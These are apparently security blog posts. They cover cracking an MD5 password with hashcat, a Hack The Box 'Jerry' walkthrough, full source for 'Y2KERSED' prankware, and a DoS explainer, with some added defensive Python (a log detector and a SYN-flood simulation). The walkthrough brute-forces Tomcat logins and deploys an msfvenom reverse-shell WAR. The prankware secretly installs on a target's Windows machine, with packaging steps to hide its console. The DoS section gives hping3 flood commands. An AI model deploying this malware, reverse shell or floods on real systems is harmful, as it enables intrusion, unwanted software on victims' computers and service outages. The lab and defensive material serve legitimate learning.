Speed.#1.........:     9780 H/s (0.06ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 512/14344385 (0.00%)
Rejected.........: 0/512 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> letmein
Hardware.Mon.#1..: Util: 66%

Started: Tue Sep 24 15:53:52 2024
Stopped: Tue Sep 24 15:54:30 2024

Success! After a few seconds we can see the hashed password has been cracked: the line 6104df369888589d6dbea304b59a32d4:blink182 shows the hash followed by the recovered password, blink182. Blink-182 fans beware, your password isn't fooling even the most amateur of hackers out there.

Try using Hashcat with the other sample hashed passwords in this post, or hash your own passwords using the All Hash Generator on Browserling.com and see if your passwords are vulnerable to dictionary attacks using rockyou.txt or other common wordlists. To learn more about Hashcat and its other features, visit their Wiki here.
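As an added example that is not part of the original post, here is the dictionary attack written out in Python: a constructed six-word list stands in for rockyou.txt, the mode numbers follow hashcat's own numbering (0, 100 and 1400 are real hashcat modes), and the same attack is then run against a salted PBKDF2 hash to show where the defensive cost comes from. The salt, iteration count and wordlist are assumptions.

```python
import hashlib
import time

# hashcat mode numbers for the unsalted hash types named in the post
# (0 = MD5, 100 = SHA-1) plus 1400 for SHA-256; these numbers are hashcat's own.
HASH_MODES = {
    0: ("MD5", hashlib.md5),
    100: ("SHA-1", hashlib.sha1),
    1400: ("SHA-256", hashlib.sha256),
}

# Constructed six-entry wordlist standing in for rockyou.txt
WORDLIST = ["123456", "password", "iloveyou", "princess", "blink182", "letmein"]

# The MD5 digest from the post, which hashcat recovered as "blink182"
SAMPLE_MD5 = "6104df369888589d6dbea304b59a32d4"


def hash_candidate(mode, password):
    """Hex digest of one candidate under the given hashcat mode."""
    _, ctor = HASH_MODES[mode]
    return ctor(password.encode("utf-8")).hexdigest()


def dictionary_attack(target_hex, mode, wordlist):
    """Hash each wordlist entry and compare it with the target digest.

    Returns (password, guesses_tried); password is None if nothing matched.
    With an unsalted fast hash every guess costs one hash computation, and
    the same guess could be reused against every hash in a dump.
    """
    target = target_hex.strip().lower()
    for guesses, candidate in enumerate(wordlist, start=1):
        if hash_candidate(mode, candidate) == target:
            return candidate, guesses
    return None, len(wordlist)


def pbkdf2_hash(password, salt, iterations):
    """Salted, iterated hash as a defender would store it (PBKDF2-HMAC-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations).hex()


def dictionary_attack_pbkdf2(target_hex, salt, iterations, wordlist):
    """Same attack against a PBKDF2 hash. Every guess now costs `iterations`
    HMAC computations, and the per-user salt means work cannot be shared
    across users or precomputed. A password that is in the wordlist still
    falls; the slow hash only raises the price of each guess."""
    for guesses, candidate in enumerate(wordlist, start=1):
        if pbkdf2_hash(candidate, salt, iterations) == target_hex:
            return candidate, guesses
    return None, len(wordlist)


def seconds_per_guess(hash_fn, rounds=20):
    """Rough per-guess cost of a hashing scheme, for comparing the two."""
    t0 = time.perf_counter()
    for _ in range(rounds):
        hash_fn("blink182")
    return (time.perf_counter() - t0) / rounds


if __name__ == "__main__":
    print(dictionary_attack(SAMPLE_MD5, 0, WORDLIST))  # ('blink182', 5)
    salt = b"constructed-per-user-salt"                 # would be random per user
    stored = pbkdf2_hash("princess", salt, 100_000)
    print(dictionary_attack_pbkdf2(stored, salt, 100_000, WORDLIST))  # ('princess', 4)
    fast = seconds_per_guess(lambda p: hash_candidate(0, p))
    slow = seconds_per_guess(lambda p: pbkdf2_hash(p, salt, 100_000))
    print(f"a PBKDF2 guess costs about {slow / fast:,.0f}x an MD5 guess")
```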

9/16/2024

HTB: Jerry

 ___  ___  _________  ________                        
|\  \|\  \|\___   ___\\   __  \  ___                  
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                 
 \ \   __  \   \ \  \ \ \   __  \|__|     _  _             
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___  (o)(o)--.           
   \ \__\ \__\   \ \__\ \ \_______\|\__\  \xx/ (  )       
    \|__|\|__|    \|__|  \|_______|\|__|  m\/m--m'`--.      
    ___  _______   ________  ________      ___    ___ 
   |\  \|\  ___ \ |\   __  \|\   __  \    |\  \  /  /|
   \ \  \ \   __/|\ \  \|\  \ \  \|\  \   \ \  \/  / /
 __ \ \  \ \  \_|/_\ \   _  _\ \   _  _\   \ \    / / 
|\  \\_\  \ \  \_|\ \ \  \\  \\ \  \\  \|   \/  /  /  
\ \________\ \_______\ \__\\ _\\ \__\\ _\ __/  / /    
 \|________|\|_______|\|__|\|__|\|__|\|__|\___/ /     
                                         \|___|/      

Hack The Box's Jerry is an Easy Windows machine that features an Apache Tomcat web server which can easily be exploited with default login credentials and a reverse shell payload generated using MSFvenom. 

Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.

ping 10.10.10.95

You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to move to enumeration using Nmap.

Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here.

nmap -sV 10.10.10.95
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-13 12:51 CDT
Nmap scan report for 10.10.10.95
Host is up (0.0088s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.57 seconds

We can see an Apache Tomcat web server running on port 8080. Let's navigate to the site by entering the target's IP address followed by :8080 into the address bar of your web browser. Upon visual inspection of the page, we can see that the server's manager app is reachable through /manager/html. Unfortunately, we are faced with a login prompt.

Let's run the login through a wordlist of default credentials for Tomcat using Metasploit. Open Metasploit in a new terminal by typing "msfconsole".

msfconsole
Metasploit tip: Use help <command> to learn more about any command
                                                  
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v6.3.44-dev                          ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >>

Let's search for Tomcat exploits using the "search" option.

search tomcat

Matching Modules
================

   #   Name                                                            Disclosure Date  Rank       Check  Description
   -   ----                                                            ---------------  ----       -----  -----------
   0   auxiliary/dos/http/apache_commons_fileupload_dos                2014-02-06       normal     No     Apache Commons FileUpload and Apache Tomcat DoS
   1   exploit/multi/http/struts_dev_mode                              2012-01-06       excellent  Yes    Apache Struts 2 Developer Mode OGNL Execution
   2   exploit/multi/http/struts2_namespace_ognl                       2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   3   exploit/multi/http/struts_code_exec_classloader                 2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
   4   auxiliary/admin/http/tomcat_ghostcat                            2020-02-20       normal     Yes    Apache Tomcat AJP File Read
   5   exploit/windows/http/tomcat_cgi_cmdlineargs                     2019-04-10       excellent  Yes    Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
   6   exploit/multi/http/tomcat_mgr_deploy                            2009-11-09       excellent  Yes    Apache Tomcat Manager Application Deployer Authenticated Code Execution
   7   exploit/multi/http/tomcat_mgr_upload                            2009-11-09       excellent  Yes    Apache Tomcat Manager Authenticated Upload Code Execution
   8   auxiliary/dos/http/apache_tomcat_transfer_encoding              2010-07-09       normal     No     Apache Tomcat Transfer-Encoding Information Disclosure and DoS
   9   auxiliary/scanner/http/tomcat_enum                                               normal     No     Apache Tomcat User Enumeration
   10  exploit/linux/local/tomcat_rhel_based_temp_priv_esc             2016-10-10       manual     Yes    Apache Tomcat on RedHat Based Systems Insecure Temp Config Privilege Escalation
   11  exploit/linux/local/tomcat_ubuntu_log_init_priv_esc             2016-09-30       manual     Yes    Apache Tomcat on Ubuntu Log Init Privilege Escalation
   12  exploit/multi/http/atlassian_confluence_webwork_ognl_injection  2021-08-25       excellent  Yes    Atlassian Confluence WebWork OGNL Injection
   13  exploit/windows/http/cayin_xpost_sql_rce                        2020-06-04       excellent  Yes    Cayin xPost wayfinder_seqid SQLi to RCE
   14  exploit/multi/http/cisco_dcnm_upload_2019                       2019-06-26       excellent  Yes    Cisco Data Center Network Manager Unauthenticated Remote Code Execution
   15  exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec    2021-05-05       excellent  Yes    Cisco HyperFlex HX Data Platform Command Execution
   16  exploit/linux/http/cisco_hyperflex_file_upload_rce              2021-05-05       excellent  Yes    Cisco HyperFlex HX Data Platform unauthenticated file upload to RCE (CVE-2021-1499)
   17  exploit/linux/http/cpi_tararchive_upload                        2019-05-15       excellent  Yes    Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
   18  exploit/linux/http/cisco_prime_inf_rce                          2018-10-04       excellent  Yes    Cisco Prime Infrastructure Unauthenticated Remote Code Execution
   19  post/multi/gather/tomcat_gather                                                  normal     No     Gather Tomcat Credentials
   20  auxiliary/dos/http/hashcollision_dos                            2011-12-28       normal     No     Hashtable Collisions
   21  auxiliary/admin/http/ibm_drm_download                           2020-04-21       normal     Yes    IBM Data Risk Manager Arbitrary File Download
   22  exploit/linux/http/lucee_admin_imgprocess_file_write            2021-01-15       excellent  Yes    Lucee Administrator imgProcess.cfm Arbitrary File Write
   23  exploit/linux/http/mobileiron_core_log4shell                    2021-12-12       excellent  Yes    MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)
   24  exploit/multi/http/zenworks_configuration_management_upload     2015-04-07       excellent  Yes    Novell ZENworks Configuration Management Arbitrary File Upload
   25  exploit/multi/http/spring_framework_rce_spring4shell            2022-03-31       manual     Yes    Spring Framework Class property RCE (Spring4Shell)
   26  auxiliary/admin/http/tomcat_administration                                       normal     No     Tomcat Administration Tool Default Access
   27  auxiliary/scanner/http/tomcat_mgr_login                                          normal     No     Tomcat Application Manager Login Utility
   28  exploit/multi/http/tomcat_jsp_upload_bypass                     2017-10-03       excellent  Yes    Tomcat RCE via JSP Upload Bypass
   29  auxiliary/admin/http/tomcat_utf8_traversal                      2009-01-09       normal     No     Tomcat UTF-8 Directory Traversal Vulnerability
   30  auxiliary/admin/http/trendmicro_dlp_traversal                   2009-01-09       normal     No     TrendMicro Data Loss Prevention 5.5 Directory Traversal
   31  post/windows/gather/enum_tomcat                                                  normal     No     Windows Gather Apache Tomcat Enumeration


Interact with a module by name or index. For example info 31, use 31 or use post/windows/gather/enum_tomcat

[msf](Jobs:0 Agents:0) >> 

We see an auxiliary/scanner/http/tomcat_mgr_login module. To use a module we can type "use" followed by the index number assigned to it in the search results.

Once the exploit has loaded, type "options" and hit Enter. This will bring up the options which we will need to configure.

use 27
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                            Required  Description
   ----              ---------------                            --------  -----------
   ANONYMOUS_LOGIN   false                                      yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false                                      no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                          yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                      no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                      no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                      no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none                                       no        Skip existing credentials stored in the current database (Accepted: none, u
                                                                          ser, user&realm)
   PASSWORD                                                     no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/data/word  no        File containing passwords, one per line
                     lists/tomcat_mgr_default_pass.txt
   Proxies                                                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/b
                                                                          asics/using-metasploit.html
   RPORT             8080                                       yes       The target port (TCP)
   SSL               false                                      no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                      yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                              yes       URI for Manager login. Default is /manager/html
   THREADS           1                                          yes       The number of concurrent threads (max one per host)
   USERNAME                                                     no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/data/word  no        File containing users and passwords separated by space, one pair per line
                     lists/tomcat_mgr_default_userpass.txt
   USER_AS_PASS      false                                      no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/word  no        File containing users, one per line
                     lists/tomcat_mgr_default_users.txt
   VERBOSE           true                                       yes       Whether to print output for all attempts
   VHOST                                                        no        HTTP server virtual host


View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >>

Our RPORT is preconfigured to the correct port, but our RHOSTS option is blank and is required to run the module. To set it we type "set RHOSTS" followed by the IP of our target machine and hit Enter. We will see a confirmation line echoing the RHOSTS value we set.

set RHOSTS 10.10.10.95
RHOSTS => 10.10.10.95
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> 

With everything set, it's time to run the module! Type "run" and hit Enter. Once it has finished running, we can see a successful login using the credentials "tomcat:s3cret"! We can now navigate back to the web server in our browser and access the manager dashboard.

On the dashboard we see an option to upload a WAR file. A WAR (Web Application Archive) file is used to distribute JAR files, Java classes, XML files, tag libraries, static web pages and other resources that together make up a web application. We can use this upload to deploy a malicious payload instead!

Let's generate a reverse tcp payload using MSFvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.13 LPORT=4444 -f war > jerry_warcia.war
Payload size: 1102 bytes
Final size of war file: 1102 bytes

We can now upload this .war file using the Tomcat dashboard and deploy it on the server. Once it has been uploaded, open a Netcat listening session in your terminal. You will then need to click the name of the uploaded payload back on the Tomcat dashboard to establish the connection. Netcat should now have a shell:

nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>

You can now navigate through the target system to obtain the root and user .txt flags.
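As an added example (not from the post or from Tomcat itself), detection logic a defender could run over Tomcat's access log to spot the sequence above: a burst of 401s on the manager from one host, a login that follows it, and an accepted WAR deployment. The log lines are constructed, the failure threshold is an assumption, and the format assumed is Tomcat's default AccessLogValve pattern.

```python
import re
from collections import defaultdict

# Tomcat's default AccessLogValve pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Constructed sample lines modelled on what the steps in the post would leave in
# localhost_access_log: six failed manager logins from one host, then a login
# with the default account and a WAR upload, plus unrelated normal traffic.
SAMPLE_LOG = """\
10.10.14.13 - - [13/Sep/2024:12:55:01 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.13 - - [13/Sep/2024:12:55:01 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.13 - - [13/Sep/2024:12:55:02 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.13 - - [13/Sep/2024:12:55:02 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.13 - - [13/Sep/2024:12:55:03 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.13 - - [13/Sep/2024:12:55:03 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.13 - tomcat [13/Sep/2024:12:55:09 -0500] "GET /manager/html HTTP/1.1" 200 16034
10.10.14.13 - tomcat [13/Sep/2024:12:56:40 -0500] "POST /manager/html/upload HTTP/1.1" 200 17011
192.168.1.20 - - [13/Sep/2024:12:57:00 -0500] "GET /index.jsp HTTP/1.1" 200 11243
192.168.1.20 - admin [13/Sep/2024:12:57:30 -0500] "GET /manager/html HTTP/1.1" 200 16034
"""

FAIL_THRESHOLD = 5  # assumed: 401s on the manager from one host before we call it guessing
MANAGER_PREFIX = "/manager/"
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text, fail_threshold=FAIL_THRESHOLD):
    """Flag manager password guessing, logins that follow it, and WAR deployments."""
    failures = defaultdict(int)          # ip -> 401 count on /manager/
    findings = {
        "bruteforce_sources": [],        # hosts that reached the failure threshold
        "logins_after_bruteforce": [],   # (ip, user) that authenticated after guessing
        "deployments": [],               # (ip, user, path) of accepted deploy requests
    }
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(MANAGER_PREFIX):
            continue
        ip, user, status = rec["ip"], rec["user"], int(rec["status"])
        path = rec["path"].split("?")[0]
        if status == 401:
            failures[ip] += 1
            if failures[ip] == fail_threshold:
                findings["bruteforce_sources"].append(ip)
            continue
        if status >= 400 or user == "-":
            continue
        # An accepted request to a deploy endpoint is a new web application
        # landing on the server; in the post that is the msfvenom WAR.
        if path in DEPLOY_PATHS and rec["method"] in ("POST", "PUT"):
            findings["deployments"].append((ip, user, path))
        if failures[ip] >= fail_threshold and (ip, user) not in findings["logins_after_bruteforce"]:
            findings["logins_after_bruteforce"].append((ip, user))
    return findings


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```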

9/09/2024

Y2KERSED: Nostalgic Malware

 __  __  _____   ___   ___  ______  ______   ______  ______  ______      
/_/\/_/\/_____/\/___/\/__/\/_____/\/_____/\ /_____/\/_____/\/_____/\     
\ \ \ \ \:::_:\ \::.\ \\ \ \::::_\/\:::_ \ \\::::_\/\::::_\/\:::_ \ \    
 \:\_\ \ \  _\:\|\:: \/_) \ \:\/___/\:(_) ) )\:\/___/\:\/___/\:\ \ \ \   
  \::::_\/ /::_/__\:. __  ( (\::___\/\: __ `\ \_::._\:\::___\/\:\ \ \ \  
    \::\ \ \:\____/\: \ )  \ \\:\____/\ \ `\ \ \/____\:\:\____/\:\/.:| | 
     \__\/  \_____\/\__\/\__\/ \_____\/\_\/ \_\/\_____\/\_____\/\____/_/ 

Y2KERSED is some Python code I wrote a while back that is meant to be used as some not-so-malicious malware that I simply label as prankware. The script creates a hidden folder on a Windows target computer, downloads AOL Instant Messenger sounds from the internet and plays them in the background at random intervals. This is obviously meant to get on the target's nerves à la nostalgia. Who doesn't miss those AIM audio alerts?

I added a kill switch to the script that can be enabled by setting the computer's clock between 2000-01-01 00:00:00 and 2000-01-02 00:00:00. Happy New Year!

In order to create an executable file that runs without a console on the target's machine, you will need to run the Python file through pyinstaller.exe using the command below:

pyinstaller.exe Y2KAudioPlugin.py --onefile --noconsole

I have included the script below as well as a link to the GitHub repository here. Remember, turn your computer off before midnight on 12/31/99.

#!/usr/bin/python3
# __  __  _____   ___   ___  ______  ______   ______  ______  ______
#/_/\/_/\/_____/\/___/\/__/\/_____/\/_____/\ /_____/\/_____/\/_____/\
#\ \ \ \ \:::_:\ \::.\ \\ \ \::::_\/\:::_ \ \\::::_\/\::::_\/\:::_ \ \
# \:\_\ \ \  _\:\|\:: \/_) \ \:\/___/\:(_) ) )\:\/___/\:\/___/\:\ \ \ \
#  \::::_\/ /::_/__\:. __  ( (\::___\/\: __ `\ \_::._\:\::___\/\:\ \ \ \
#    \::\ \ \:\____/\: \ )  \ \\:\____/\ \ `\ \ \/____\:\:\____/\:\/.:| |
#     \__\/  \_____\/\__\/\__\/ \_____\/\_\/ \_\/\_____\/\_____\/\____/_/ V1.0
#
# Y2KERSED is prankware developed by Kersed. This malware makes the
# target Windows system randomly play AIM audio files from the 90s and early 00s.
# Kill switch can be enabled by setting system clock between
# 2000-01-01 00:00:00 and 2000-01-02 00:00:00.
#

import os
import string
import time
import datetime
import random
from random import randint

import requests
from playsound import playsound

# Audio file source URLs
audio_url_list = ["https://archive.org/download/im_20191103/BuddyIn.wav",
                  "https://archive.org/download/im_20191103/BuddyOut.wav",
                  "https://archive.org/download/im_20191103/You%27ve%20Got%20Mail.wav",
                  "https://archive.org/download/im_20191103/IM.wav"]

# Hidden folder that holds the downloaded WAVs (a plain string with one
# escaped backslash; a raw r"C:\\..." literal would double the separator)
sound_path = "C:\\Y2KAudioPlugin"

# Kill switch window: start is inclusive, end is exclusive
start = datetime.datetime.strptime("01-01-2000", "%d-%m-%Y")
end = datetime.datetime.strptime("02-01-2000", "%d-%m-%Y")


def in_kill_window(moment):
    """True when the system clock is inside the kill switch window."""
    return start <= moment < end


# Run Y2KAudioPlugin until the clock enters the kill window
kill_check = datetime.datetime.now()
while not in_kill_window(kill_check):

    # Download sound folder on the first run
    if not os.path.exists(sound_path):

        # Create hidden folder
        os.mkdir(sound_path)
        os.system("attrib +h " + sound_path)

        # Download WAVs to hidden folder; sample the letters without
        # replacement so two files cannot get the same name and overwrite
        letters = random.sample(string.ascii_letters, len(audio_url_list))
        for url, letter in zip(audio_url_list, letters):
            filename = os.path.join(sound_path, letter + ".wav")
            r = requests.get(url, timeout=30)
            with open(filename, 'wb') as f:
                f.write(r.content)

    # Play a random sound file
    sound_files = os.listdir(sound_path)
    sound_file = random.choice(sound_files)
    playsound(os.path.join(sound_path, sound_file))
    time.sleep(randint(0, 5))  # Delay between sounds
    kill_check = datetime.datetime.now()

# Kill switch reached: terminate
quit()


9/04/2024

Understanding DoS Attacks


A DoS (Denial-of-Service) attack floods a target network or server with more traffic than it can handle, overloading it until service is disrupted or the target crashes. To better understand DoS attacks at the network level, we need to understand how network traffic is transported: data is broken up into packets, which are sent individually to the destination.

An ICMP flood attack is a type of DoS attack in which an attacker repeatedly sends Internet Control Message Protocol (ICMP) packets to a network server, forcing the server to reply with an ICMP packet for each one. This eventually uses up the bandwidth for incoming and outgoing traffic and causes the server to crash. We can replicate this attack using a packet generator program called hping, which is available in most Linux repositories. See the command below, where "*target_ip*" is the IP of the targeted network and "-1" selects the ICMP protocol:

sudo hping3 -1 --flood *target_ip*

Another common DoS attack is the SYN flood. This attack uses the Transmission Control Protocol (TCP) and floods the server with synchronize (SYN) packets. To establish a TCP connection, a device sends a SYN packet to a server. The server responds with a SYN/ACK packet to acknowledge the device's request and keeps the half-open connection waiting for the final step of the handshake. Once the server receives the final acknowledgement (ACK) packet from the device, the 3-way handshake is complete and a TCP connection is established. Attackers take advantage of this by flooding a server with SYN packets and never completing the 3-way handshake, so the server's table of half-open connections fills up. This attack can be replicated using hping with the following command, where "-d 300" is the amount of data in bytes to send in each packet, "-p 80" is the port you wish to attack, the "-S" switch places hping in SYN mode, and "*target_ip*" is the IP of the targeted network:

sudo hping3 -d 300 -p 80 -S --flood *target_ip*
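As an added illustration (not from the post), a small Python model of the listener's half-open connection table under the SYN flood described above. The backlog size, timeout, packet trace and the per-source SYN-to-ACK ratio check are all constructed assumptions; the syn_cookies option shows the standard mitigation, with cookie validation itself assumed correct rather than modelled.

```python
from collections import defaultdict

# Constructed server-side parameters (assumptions, not measured values)
BACKLOG = 128             # half-open connections the listener will hold
HALF_OPEN_TIMEOUT = 30.0  # seconds before an unanswered SYN/ACK is dropped


class Listener:
    """Handshake state of one listening port.

    A SYN makes the server send SYN/ACK and remember the half-open connection;
    the client's final ACK completes it. SYNs that never get their ACK fill
    the table, and new legitimate SYNs are refused until old entries time out.
    With syn_cookies=True the server keeps no state once the table is full and
    relies on validating the later ACK instead (validation assumed correct).
    """

    def __init__(self, backlog=BACKLOG, timeout=HALF_OPEN_TIMEOUT, syn_cookies=False):
        self.backlog, self.timeout, self.syn_cookies = backlog, timeout, syn_cookies
        self.pending = {}          # (src_ip, src_port) -> time SYN/ACK was sent
        self.established = 0
        self.refused_syns = 0
        self.cookies_sent = 0

    def expire(self, now):
        self.pending = {k: t for k, t in self.pending.items() if now - t < self.timeout}

    def on_syn(self, now, key):
        self.expire(now)
        if len(self.pending) < self.backlog:
            self.pending[key] = now
        elif self.syn_cookies:
            self.cookies_sent += 1      # reply with SYN/ACK, keep no state
        else:
            self.refused_syns += 1      # this is the denial of service

    def on_ack(self, now, key):
        if self.pending.pop(key, None) is not None or self.syn_cookies:
            self.established += 1


def simulate(events, syn_cookies=False, min_syns=20, max_ack_ratio=0.1):
    """Replay (time, src_ip, src_port, flag) events, flag "S" (SYN) or "A" (ACK).

    Returns the listener's counters plus the sources whose SYNs almost never
    get an ACK, the simplest per-source SYN flood indicator.
    """
    lst = Listener(syn_cookies=syn_cookies)
    syns, acks = defaultdict(int), defaultdict(int)
    for t, ip, port, flag in sorted(events, key=lambda e: e[0]):
        if flag == "S":
            syns[ip] += 1
            lst.on_syn(t, (ip, port))
        else:
            acks[ip] += 1
            lst.on_ack(t, (ip, port))
    suspects = sorted(ip for ip in syns
                      if syns[ip] >= min_syns and acks[ip] / syns[ip] <= max_ack_ratio)
    return {"established": lst.established, "refused_syns": lst.refused_syns,
            "half_open": len(lst.pending), "cookies_sent": lst.cookies_sent,
            "suspects": suspects}


def build_events():
    """Constructed trace: 200 SYNs from one host with no ACKs (what a SYN flood
    produces) interleaved with two ordinary clients that complete the handshake."""
    events = [(i * 0.01, "203.0.113.7", 40000 + i, "S") for i in range(200)]
    events += [(0.505, "198.51.100.9", 5555, "S"), (0.555, "198.51.100.9", 5555, "A")]
    events += [(1.505, "198.51.100.10", 6666, "S"), (1.555, "198.51.100.10", 6666, "A")]
    return events


if __name__ == "__main__":
    print(simulate(build_events()))                    # second client is refused
    print(simulate(build_events(), syn_cookies=True))  # both clients established
```

In the first run the table is full by the time the second client's SYN arrives, so that SYN is refused and only one connection is established; with cookies the same trace yields two.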

A standard DoS attack from a single source of network traffic is usually not enough to cause any major disruption, let alone crash a network. A DDoS attack is a Distributed Denial-of-Service attack. DDoS attacks are usually performed using botnets, large collections of compromised private internet-connected devices infected with malware and controlled as a group. These compromised devices are sometimes referred to as "zombies". Using a botnet, an attacker can send requests from all of these computers at once to have a larger impact on the network's bandwidth, making it easier to crash the target network.